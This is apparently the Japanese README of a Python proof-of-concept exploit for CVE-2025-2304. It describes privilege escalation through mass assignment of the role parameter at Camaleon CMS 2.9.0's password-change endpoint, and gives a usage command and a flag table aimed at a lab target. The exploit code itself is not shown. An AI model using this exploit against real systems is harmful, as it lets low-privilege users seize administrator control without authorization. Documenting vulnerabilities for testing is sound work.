
CVE-2025-2304 の Python 概念実証エクスプロイト。Camaleon CMS 2.9.0 におけるパスワード変更エンドポイントでのマスアサインメントを利用した権限昇格を可能にします。
CVE-2025-2304 の PoC — Camaleon CMS 2.9.0 におけるパスワード変更エンドポイントでのマスアサインメントによる権限昇格。
/admin/users/:id/updated_ajax エンドポイントは、モデル更新に渡す前に role パラメータをフィルタリングしないため、認証されたユーザーであれば誰でも管理者に権限昇格できます。
python3 CVE-2025-2304-POC.py -u http://target.htb --username bob --password bob123 --user-id 5
| フラグ | 説明 |
|---|---|
-u | ターゲットのベースURL |
--username | 低権限のユーザー名 |
--password | 現在のパスワード |
--new-password | 変更後の新しいパスワード(オプション、デフォルトは現在のパスワード) |
--user-id | ターゲットユーザーのID |
pip install requests